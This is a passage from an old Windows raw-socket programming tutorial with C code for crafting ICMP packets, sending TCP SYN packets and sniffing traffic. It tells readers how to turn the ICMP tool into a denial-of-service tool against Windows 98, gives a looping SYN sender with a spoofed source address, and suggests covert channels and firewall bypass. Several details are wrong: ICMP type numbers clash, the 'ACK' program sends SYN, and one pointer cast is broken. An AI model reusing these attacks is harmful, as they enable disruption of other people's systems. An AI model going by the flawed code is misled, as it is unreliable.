ip_verlen; // version & IHL => 1 Bytes (combined size of both) unsigned char ip_tos; // TOS => 1 Bytes unsigned short ip_totallength; // Total length => 2 Bytes unsigned short ip_id; // Identification => 2 Bytes unsigned short ip_offset; // Fragment Offset => 2 Bytes unsigned char ip_ttl; // Time to live => 1 Bytes unsigned char ip_protocol; // Protocol => 1 Bytes unsigned short ip_checksum; // Header checksum => 2 Bytes unsigned int ip_srcaddr; // Source address => 4 Bytes unsigned int ip_destaddr; // Destination address => + 4 Bytes // = 20 Bytes }IP_HDR; // ICMP Header typedef struct tagICMPHDR { unsigned char icmp_type; // Type of message => 1 Bytes unsigned char icmp_code; // Type sub code => 1 Bytes unsigned short icmp_cksum; // Checksum => 2 Bytes unsigned short icmp_id; // Identifer => 2 Bytes unsigned short icmp_seq; // sequence number => + 2 Bytes // = 8 Bytes } ICMPHDR, *PICMPHDR; #define REQ_DATASIZE 32 // Echo Request Data size // ICMP Echo Request typedef struct tagECHOREQUEST { ICMPHDR icmpHdr; char cData[REQ_DATASIZE]; } ECHOREQUEST, *PECHOREQUEST; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } /********************* icmp.h header file ************************/ So in the header file we first #defined some code type for ICMP Echo Request to make things a bit more readable later on, then we set up our IP and ICMP structures by giving variables for each field in the Protocol headers. Notice the sizes of each field add up correctly for the sizes of the protocol headers, we also have a structure called ECHOREQUEST, all icmp messages have different fields except for the common ones defined in the icmp header above, the fields of ECHOREQUEST are the extra fields nedded for echo's. We then have a function to calculate the checksum, all these bits of code are just placed inside our .h file to keep things shorter and more readable in the main program, speaking of which... /********************* icmp.c source file ************************/ // Make sure you always include your headers and link your libraries :) #include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <stdlib.h> #include "icmp.h" void main(int argc, char **argv) { DWORD dip = inet_addr(argv[1]); WSADATA wsaData; SOCKET sock; static ECHOREQUEST echo_req; struct sockaddr_in sin; // Startup WinSock if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) { printf("WSAStartup failure!"); } // Create a raw socket if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == SOCKET_ERROR) { printf("Error starting socket"); } sin.sin_family = AF_INET; sin.sin_port = htons(0); sin.sin_addr.s_addr = dip; // Fill in echo request echo_req.icmpHdr.icmp_type = ICMP_ECHOREQ; echo_req.icmpHdr.icmp_code = 0; echo_req.icmpHdr.icmp_cksum = 0; echo_req.icmpHdr.icmp_id = 1; echo_req.icmpHdr.icmp_seq = 1; // Fill in some data to send memset(echo_req.cData, ' ', REQ_DATASIZE); // Compute checksum echo_req.icmpHdr.icmp_cksum = checksum((unsigned short *)&echo_req, sizeof(ECHOREQUEST)); // Status mesage printf("Sending Echo Request to <%s>.\n", argv[1]); // Send the echo request if (sendto(sock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (SOCKADDR *) dip, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { printf("sendto() failed: %d\n", WSAGetLastError()); return -1; } // Status mesage printf("Message Sent\n"); // Close socket and WinSock closesocket(sock); WSACleanup(); return 0; } /********************* icmp.c source file ************************/ Well start up your compiler and link to the Ws2_32.lib file then add the icmp.c and icmp.h files to a new project. Compile and run this program by typing icmp 127.0.0.1 at the command line. The program takes the argument passed to it, 127.0.0.1 or any other IP Address you want and sends an ICMP message with a type of 13 and a code of 0, this setting is an ICMP echo request. Now remember that whatever values you enter in the code for the ICMP headers fields, that is the type of ICMP Message that is sent. For example, if we were to change the type to 17 then we would be sending a ICMP Netmask request, the target machine would then send back a Netmask Reply which we could use to map a target network. Or say if we went to www.tlsecurity.com and browsed for vulnerabilities and the words ICMP and Win98 were to catch our eye, here we would find a vulnerability for Windows 98 called p-smash. Now this advisory tells us that if we sent an icmp message to a computer running Windows 98 that had a Type of 9 and a code of 0 then the thing halt and stop responding. Therefore all we have to do with the above program is change: #define ICMP_ECHOREQ 13 to #define ICMP_ECHOREQ 19 in the header file, then when we send this to a Windows 98 machine the thing halts, an icmp DoS tool. Lamer Alert: I was using the above as an example DoS tools are indeed very lame!! and just shouldn't be used or designed, advisories are of course a good thing, they prompt vendors to do something about security vulnerabilities and promote security awareness, don't be lame, don't use DoS tools, otherwise you'll give Steve Gibson more stuff to prattle on about and ill have to bore ya to death with more flaming of 'the prick' (yes by flaming of the prick i am refering to Giving out about Gibson not medical conditions, I know what you were thinking cyberwolf!). 6.2 TCP ACK PACKET ======================================= /*********************** ip.h header file *************************/ #include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <stdio.h> struct tcpheader { unsigned short int th_sport; unsigned short int th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_x2:4, th_off:4; unsigned char th_flags; unsigned short int th_win; unsigned short int th_sum; unsigned short int th_urp; }; /* total tcp header length: 20 bytes (=160 bits) */ struct ipheader { unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */ unsigned char ip_tos; unsigned short int ip_len; unsigned short int ip_id; unsigned short int ip_off; unsigned char ip_ttl; unsigned char ip_p; unsigned short int ip_sum; unsigned int ip_src; unsigned int ip_dst; }; /* total ip header length: 20 bytes (=160 bits) */ // Psuedo Header typedef struct ps_hdr { unsigned int source_address; // Source Address => 4 Bytes unsigned int dest_address; // Destination Address => 4 Bytes unsigned char placeholder; // Place Holder => 1 Bytes unsigned char protocol; // Protocol => 1 Bytes unsigned short tcp_length; // TCP Length => + 2 Bytes // = 12 Bytes struct tcpheader tcp; }PS_HDR; // IP/TCP/UDP Checksum Function USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } /*********************** ip.h header file *************************/ Well that header file contained a few #define's, these dealt with TCP's control bits like ack and sequence and so on to make things more readable later. We then setup up the structures for the IP, TCP and Psuedo Headers and the function to calculate the checksum. Now lets put the header to use with the ack program, this program will send a single ACK packet to whatever computer you specify. /********************** main.c source file ************************/ #include "ip.h" #define PORT 25 int main (void) { WSADATA wsd; char datagram[4096]; bool bOpt = 1; if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("WSAStartup() failed: %d\n", GetLastError()); return -1; } // Create a raw socket SOCKET s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == INVALID_SOCKET) { printf("WSASocket() failed: %d\n", WSAGetLastError()); return -1; } struct ipheader *iph = (struct ipheader *) datagram; struct tcpheader *tcph = (struct tcpheader *) datagram + sizeof (struct ipheader); struct sockaddr_in sin; PS_HDR pseudo_header; sin.sin_family = AF_INET; sin.sin_port = htons (PORT); sin.sin_addr.s_addr = inet_addr ("127.0.0.1"); memset (datagram, 0, 4096); /* zero out the buffer */ iph->ip_hl = 5; iph->ip_v = 4; iph->ip_tos = 0; iph->ip_len = sizeof (struct ipheader) + sizeof (struct tcpheader); iph->ip_id = 1; iph->ip_off = 0; iph->ip_ttl = 255; iph->ip_p = 6; iph->ip_sum = 0; iph->ip_src = inet_addr ("1.2.3.4"); iph->ip_dst = sin.sin_addr.s_addr; tcph->th_sport = htons (1234); tcph->th_dport = htons (PORT); tcph->th_seq = rand(); tcph->th_ack = 0; tcph->th_x2 = 0; tcph->th_off = 0; tcph->th_flags = 2; // SYN tcph->th_win = htons(65535); tcph->th_sum = 0; tcph->th_urp = 0; // Build the Psuedo Header pseudo_header.source_address = inet_addr ("1.2.3.4"); pseudo_header.dest_address = sin.sin_addr.s_addr; pseudo_header.placeholder = 0; pseudo_header.protocol = IPPROTO_TCP; pseudo_header.tcp_length = htons(sizeof(tcpheader)); // Calculate Checksum tcph->th_sum = checksum((unsigned short *)&pseudo_header, sizeof(pseudo_header)); iph->ip_sum = checksum((unsigned short *)&iph, sizeof(ipheader)); // ENABLE IPHDRINCL if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)) == SOCKET_ERROR) { printf("setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } while (1) { // Send The Packet if (sendto(s, datagram, sizeof(datagram), 0, (SOCKADDR *)&sin, sizeof(sin)) == SOCKET_ERROR) { printf("sendto() failed: %d\n", WSAGetLastError()); return -1; } } return 0; } /********************** main.c source file ************************/ This program sends a tcp SYN packet to a target (you), it is a simple program but a very powerful one. You can edit all of the header fields enabling us to spoof our ip address amongst other things. Notice that we can also set the port numbers, some firewalls will let a packet with a port of 53 trough and not even log it, by knowing security tid bits like this we can build better more sophisticated programs. 7.0 RECIEVING RAW PACKETS ======================================= Recieving Raw Packets was never dealt with in the Berkeley Raw Socket specification, so far only linux 2.2.3 and up I believe ever dealt with them, it is of course therefore surprising that Microsoft has indeed supported a way to recieve raw packets with our programs! Yes indeed I am starting to like the guy who came up with the idea of supporting raw sockets in Windows more and more! But how do we do it? Well what we do is this: sniff all incomming packets on our computer and filter them for the packet we are looking for. This method can be used for, obviously, creating a packet sniffer and also for a firewall or some port redirection tool. Very good idea. We do it by creating a new raw socket and binding it to the interface, go into promiscuous mode and grab all the incomming packets. As usual we would set up our socket with something like the following: SOCKET sniffsock; SOCKADDR_IN if0; sniffsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP); and then call bind() with this raw socket: bind(sniffsock, (SOCKADDR *)&if0, sizeof(if0)); we then go into Promiscuous mode and recieve all of the packets by calling WSAIoctl() with SIO_RCVALL set: WSAIoctl(sniffsock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL); we can then use the WSARecv() function to grab the packets and feed them into a buffer like so: recv(sniffsock, RecvBuf, sizeof(RecvBuf), 0); We then use our own filterpacket() function to look for the particular packet that we want. So now for some example source code, this program will capture all packets sent to your computer for as long as the program is running, to do this well use a while loop to capture the packets then pass the packet to a function called filterpacket() in order to get the information from the packets headers. First create a new project and add a .cpp c++ source file. Here comes the science bit. /********************** recv.c source file ************************/ #include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <stdio.h> void outtie(char *p) { FILE *fp = fopen("Sniffer1.txt","a+"); fprintf(fp,"%s\n",p); fclose(fp); } #define SIO_RCVALL _WSAIOW(IOC_VENDOR,1) #define MAX_ADDR_LEN 16 #define MAX_HOSTNAME_LAN 255 typedef struct _iphdr { unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP; }IP_HDR; void RecvPacket(); int filterpacket(char *buf); char output[500]; void main() { RecvPacket(); } void RecvPacket() { SOCKET sock; WSADATA wsd; char RecvBuf[65535] = {0}; DWORD dwBytesRet; unsigned int optval = 1; WSAStartup(MAKEWORD(2,1),&wsd); sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP); char FAR name[MAX_HOSTNAME_LAN]; gethostname(name, MAX_HOSTNAME_LAN); struct hostent FAR * pHostent; pHostent = (struct hostent * )malloc(sizeof(struct hostent)); pHostent = gethostbyname(name); SOCKADDR_IN sa; sa.sin_family = AF_INET; sa.sin_port = htons(6000); memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length); bind(sock, (SOCKADDR *)&sa, sizeof(sa)); WSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL); while (1) { memset(RecvBuf, 0, sizeof(RecvBuf)); recv(sock, RecvBuf, sizeof(RecvBuf), 0); filterpacket(RecvBuf); } } // Filter the Packet int filterpacket(char *buf) { IP_HDR *pIpheader; char szSourceIP[MAX_ADDR_LEN], szDestIP[MAX_ADDR_LEN]; SOCKADDR_IN saSource, saDest; int iProtocol, iTTL; pIpheader = (IP_HDR *)buf; //Check Proto iProtocol = pIpheader->proto; if(iProtocol==IPPROTO_TCP) { sprintf(output,"Protocol is TCP"); outtie(output); } if(iProtocol==IPPROTO_UDP) { sprintf(output,"Protocol is UDP"); outtie(output); } if(iProtocol==IPPROTO_ICMP) { sprintf(output,"Protocol is ICMP"); outtie(output); } //Check Source IP saSource.sin_addr.s_addr = pIpheader->sourceIP; strncpy(szSourceIP, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN); //Check Dest IP saDest.sin_addr.s_addr = pIpheader->destIP; strncpy(szDestIP, inet_ntoa(saDest.sin_addr), MAX_ADDR_LEN); iTTL = pIpheader->ttl; //Output sprintf(output,"%s->%s", szSourceIP, szDestIP); outtie(output); sprintf(output,"TTL=%d", iTTL); outtie(output); printf("\n"); return true; } /********************** recv.c source file ************************/ As i said this program will simply capture all packets sent to your machine, it will then output their details to a file called Sniffer.txt in the same directory as the program, as long as the program is running the window will remain black but it is still outputting the information. To enhance this program you could check the value of pIpheader->proto field and add code to handle the underlying tcp header or just format the output better. You will notice the line #define SIO_RCVALL _WSAIOW(IOC_VENDOR,1) at the top of the file, this must be defined in all programs that capture packets, not sure why it wasn't just defined in one of the standard header files but what can we do. You could use this and the previous program in unison to send a packet and recv, checking received packets header fields to match values you sent out, working the two together to build up a more complex program. 8.0 Last Words. ======================================= With a tear in my eye its time unfortunately, to go. I hope you enjoyed this final tutorial in the series and learnt alot from the series as a whole and I hope you go on to apply the knowledge you have learned from this tutorial and from source code and create some great security applications, maybe you can put all of the knowledge you have together to create something good and now with an understanding of protocols and how to implement them trough code you can review some security features on the internet and create some excellent new programs. So I leave you now with my TOP 5 suggestions to use your new knowledge, seperately or in unison. 1. A stealth port scanner, sending ACK packets and listening for the packets returned to find out if the port is open (A SYN packet) closed (A RST Packet) or filtered (ICMP Blocked message). 2. OS Fingerprinting, filtering the packets sent by a computer to your own to identify the operating system in use. 3. Packet capturing, dumping the packets you sniff to a text file to examine them and learn protocols like icq or napster. 4. Stealth Communication, sending data in ICMP or ACK packets so there not found by firewalls. 5. Build a firewall, filter the recieved packets to watch for signs of attack or system penetration (sounds kinky :P). Now you could even alter existing programs to add new features, send packets on ports 53 or 81 to bypass firewalls like checkpoint. OS finger print recieved packets to uncover firewall tricks like spoofing the source ip of the target your trying to get to, any many other things to aid in system security, or insecurity. [ SHOUTS! ] Starman_Jones - Thanks for everything over the years (especially for my own room). Vsus - I am never drinking Tsambuca with you again :P. Delusive - Delusive's breasts owns j00!!!! BSRF - Thanks to every-1 at BSRF for releasing this and for being a good laugh :). secure@microsoft.com - The things you poor people must have to go trough. Greg from microsoft - Your a better man than I.